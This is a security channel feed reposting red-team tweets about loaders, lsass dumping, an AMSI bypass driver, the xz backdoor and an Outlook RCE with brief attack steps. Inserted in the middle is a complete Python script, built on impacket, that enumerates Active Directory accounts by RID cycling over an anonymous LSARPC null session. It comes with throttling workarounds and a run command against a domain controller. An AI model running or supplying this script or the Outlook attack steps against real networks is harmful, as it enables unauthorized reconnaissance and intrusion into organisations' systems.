😈 [ Octoberfest7 @Octoberfest73 ]
This April Fools Day, I'm excited to release my latest research and blog post from my time at @RedSiege: SSHishing. The name might be a joke, but the technique isn't!
Read the details here:
🔗 https://redsiege.com/sshishing
🐥 [ tweet ]
🤔2
😈 [ Cipher007 @xCipher007 ]
It's my first payload loader, built with my learnings from @MalDevAcademy! Check it out:
🔗 https://github.com/Cipher7/ChaiLdr
🐥 [ tweet ]
👍4
😈 [ Alex Plaskett @alexjplaskett ]
A blog on reversing Dark Souls 3 networking by Tim Leonard:
Connection:
🔗 https://timleonard.uk/2022/05/29/reverse-engineering-dark-souls-3-networking
Packets:
🔗 https://timleonard.uk/2022/06/02/reverse-engineering-dark-souls-3-networking-part-2
Key Exchange:
🔗 https://timleonard.uk/2022/06/03/reverse-engineering-dark-souls-3-networking-part-3
Reliable UDP:
🔗 https://timleonard.uk/2022/06/09/reverse-engineering-dark-souls-3-networking-part-4
More:
🔗 https://timleonard.uk/2022/06/18/reverse-engineering-dark-souls-3-networking-part-5
🔗 https://timleonard.uk/2022/06/18/reverse-engineering-dark-souls-3-networking-part-6
🔗 https://timleonard.uk/2022/06/20/reverse-engineering-dark-souls-3-networking-part-7
🐥 [ tweet ]
🔥5👍3
😈 [ taha @lordx64 ]
Imagine you are the threat actor behind the xz backdoor and you have to explain to your boss why you spent 6+ months building something this complex that a single dude reversed, documented, exploited, repurposed, honeypotted and dockerized in 24 hours. This is a W
🔗 https://github.com/amlweems/xzbot
🐥 [ tweet ]
😁12🥱3😢2👍1🔥1
😈 [ Mayfly @M4yFly ]
SCCM Lab write up 📝part 0x3 is out:
🔗 https://mayfly277.github.io/posts/SCCM-LAB-part0x3/
- Exploit as client admin
- Exploit as sccm admin
Find all the articles about the SCCM laboratory exploitation here:
🔗 https://mayfly277.github.io/categories/sccm/
🐥 [ tweet ]
👍6
Forwarded from Just Security
Judging by everything, the #pentestaward winner's statuette not only pleases the eye but also comes in handy around the house for our prize winners. If you want one too, don't miss the announcement of the new season of the award for ethical hackers!
We'll publish the details soon 😉
* be sure to turn the sound on
🔥5👍3🥱3
😈 [ Mark Baggett @MarkBaggett ]
Kerberoasting was discovered more than 8 years ago. But it’s still effective today. Do you know how it works and how it was discovered? Check out @TimMedin of @RedSiege in this episode.
🔗 https://youtu.be/KHkYd81wHTg?si=Hy_sJN_YjQqSnL6J
🐥 [ tweet ]
🔥4🤯3👍1
😈 [ Mark Baggett @MarkBaggett ]
Do you know the history of Metasploit? How did it grow from a small project to a game changer for Infosec? Check out this episode of Infosec. Toolshed featuring @hdmoore
🔗 https://youtu.be/Dl6qNRCiPgo?si=-zKticbSGYqlL6H7
🐥 [ tweet ]
👍4
😈 [ Ido Veltzman @Idov31 ]
After a long time, the 6th and final part of Lord Of The Ring0 is here:
In this part, the focus will be on kernel mode and user mode memory interaction, a look into how process attaching works, and writing an AMSI bypass driver:
🔗 https://idov31.github.io/posts/lord-of-the-ring0-p6
🐥 [ tweet ]
🔥5
😈 [ Diego Capriotti @naksyn ]
One thing I always look for when starting in a network without AD creds is user enumeration with RPC null sessions.
impacket's SAMR (samrdump) and LSARPC (lookupsid) tools will give you only a small part of the story. Here's my minimal RID cycling script that outplayed everything else, enabling me to find some crackable ASREP-roastable DA accounts hiding with RID > 50000 that could not be found using other tools.
I am using chunks to avoid DoS and getting NT_STATUS_INSUFFICIENT_RESOURCES; of course you can tweak it according to your YOLO level.
There will be a new RPC connection for every chunk; it's a bit better than cycling with rpcclient and always starting RPC connections from scratch every time. However, RID cycling with rpcclient will generate a ton of STATUS_NO_SUCH_USER responses that are sus, if someone is looking and knows what to look for, of course.
🔗 https://gist.github.com/naksyn/8204c76cda2541e72668fa065ba94c09
🐥 [ tweet ]
🔥4
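A chunked RID-cycling script over an LSARPC null session, added here as an illustration of the technique in the post above; it is built from scratch on impacket's LSARPC bindings and is not the author's gist. It does what the post describes: one fresh RPC connection per chunk, STATUS_NONE_MAPPED and STATUS_SOME_NOT_MAPPED treated as (partial) results, and a paused retry when the target answers STATUS_INSUFFICIENT_RESOURCES. The RID window (500 to 60000), chunk size, retry count and backoff delay are this example's own assumptions, as is the requirement that the target accept an anonymous bind to lsarpc.

```python
"""Chunked RID cycling over an LSARPC null session.

Added illustration built on impacket (not the gist linked in the post).
Assumptions: impacket is installed, the target accepts an anonymous bind
to \\PIPE\\lsarpc, and the RID window, chunk size and retry policy below
are arbitrary choices for the example.
"""
import sys
import time

START_RID, MAX_RID = 500, 60000   # assumption: scan well past the default RID range
CHUNK = 1000                      # assumption: SIDs per LsarLookupSids call
RETRIES, BACKOFF = 3, 2.0         # assumption: retry policy on INSUFFICIENT_RESOURCES


def rid_chunks(start, stop, size):
    """Yield consecutive half-open RID ranges [a, b) of at most `size` RIDs."""
    a = start
    while a < stop:
        b = min(a + size, stop)
        yield a, b
        a = b


def sid_strings(domain_sid, a, b):
    """Build the textual SIDs for RIDs a..b-1 under domain_sid."""
    return ["%s-%d" % (domain_sid, rid) for rid in range(a, b)]


def open_lsarpc(target):
    """Fresh null-session DCE/RPC bind to lsarpc; returns (dce, policy, domain_sid)."""
    from impacket.dcerpc.v5 import lsad, lsat, transport
    from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED

    rpc = transport.SMBTransport(target, 445, r"\lsarpc", username="", password="")
    dce = rpc.get_dce_rpc()
    dce.connect()
    dce.bind(lsat.MSRPC_UUID_LSAT)
    policy = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)["PolicyHandle"]
    info = lsad.hLsarQueryInformationPolicy2(
        dce, policy, lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)
    domain_sid = info["PolicyInformation"]["PolicyAccountDomainInfo"]["DomainSid"].formatCanonical()
    return dce, policy, domain_sid


def lookup_chunk(dce, policy, domain_sid, a, b):
    """One LsarLookupSids call for RIDs a..b-1; returns [(rid, 'DOMAIN\\name', type)]."""
    from impacket.dcerpc.v5 import lsat
    from impacket.dcerpc.v5.rpcrt import DCERPCException
    from impacket.dcerpc.v5.samr import SID_NAME_USE

    sids = sid_strings(domain_sid, a, b)
    try:
        resp = lsat.hLsarLookupSids(dce, policy, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWkstaWinsta)
    except DCERPCException as e:
        if "STATUS_NONE_MAPPED" in str(e):
            return []                  # no RID in this range exists
        if "STATUS_SOME_NOT_MAPPED" in str(e):
            resp = e.get_packet()      # partial success still carries the resolved names
        else:
            raise                      # INSUFFICIENT_RESOURCES etc. are handled by the caller
    hits = []
    for rid, item in zip(range(a, b), resp["TranslatedNames"]["Names"]):
        if item["Use"] == SID_NAME_USE.SidTypeUnknown:
            continue
        domain = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]]["Name"]
        hits.append((rid, "%s\\%s" % (domain, item["Name"]), SID_NAME_USE.enumItems(item["Use"]).name))
    return hits


def cycle(target, start=START_RID, stop=MAX_RID, chunk=CHUNK):
    """Walk the RID space in chunks, one RPC connection per chunk, pausing when throttled."""
    from impacket.dcerpc.v5.rpcrt import DCERPCException

    hits = []
    for a, b in rid_chunks(start, stop, chunk):
        for attempt in range(RETRIES):
            dce, policy, domain_sid = open_lsarpc(target)   # new connection for every chunk
            try:
                hits.extend(lookup_chunk(dce, policy, domain_sid, a, b))
                break
            except DCERPCException as e:
                if "STATUS_INSUFFICIENT_RESOURCES" not in str(e) or attempt == RETRIES - 1:
                    raise
                time.sleep(BACKOFF * (attempt + 1))   # back off, then redo the same chunk
            finally:
                dce.disconnect()
    return hits


if __name__ == "__main__":
    for rid, name, kind in cycle(sys.argv[1]):
        print("%d: %s (%s)" % (rid, name, kind))
```

Run it as `python3 ridcycle.py <dc-or-host>`; lowering CHUNK trades speed for fewer STATUS_INSUFFICIENT_RESOURCES retries, and raising MAX_RID is what reaches accounts with RIDs above 50000 that a default-range sweep misses.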
😈 [ Ricardo Ruiz @RicardoJoseRF ]
Last week I made public NativeDump, a tool to dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!). Check it out here:
🔗 https://github.com/ricardojoserf/NativeDump
🐥 [ tweet ]
🔥9
😈 [ Filip Dragovic @filip_dragovic ]
I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today, tracked as CVE-2024-21447. With some modifications it can be ported to CVE-2024-21447.
🔗 https://github.com/Wh04m1001/UserManagerEoP
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36047
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21447
🐥 [ tweet ]
👍4
😈 [ TrustedSec @TrustedSec ]
TAC Practice Lead @mega_spl0it and co-author @4ndr3w6S are back with the final installment of A Hitch-Hacker’s Guide to DACL-Based Detections. Read about the additional attributes they found on our blog!
🔗 https://trustedsec.com/blog/a-hitch-hackers-guide-to-dacl-based-detections-the-addendum
🐥 [ tweet ]
🔥3
😈 [ Octoberfest7 @Octoberfest73 ]
I spent the past couple of days playing with and contributing to @R0h1rr1m's Shoggoth project, which can turn PEs and BOFs into PIC. Super cool project, and one that opens up some interesting possibilities 😉
🔗 https://github.com/frkngksl/Shoggoth
🐥 [ tweet ]
🔥5
Forwarded from PT SWARM
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
🔥5👍4
😈 [ Andy Gill @ZephrFish ]
My latest post on the @Lares_ Labs blog is live. It discusses a real-world scenario we observed during a pentest.
🔗 https://labs.lares.com/this-one-time-on-a-pentest/
🐥 [ tweet ]
🥱1
Freedom F0x
A manual for scratching your ego:
1. Open a random pentest guide.
2. Go to the references.
3. Count the matches for your nickname.
4. If > 0: rejoice, forgetting the frailty of existence for a couple of seconds (else: tilt).
😁26👍4🥱1
😈 [ Fabio Assolini @assolini ]
XZ backdoor story – Initial analysis
🔗 https://securelist.com/xz-backdoor-story-part-1/112354/
🐥 [ tweet ]
👍8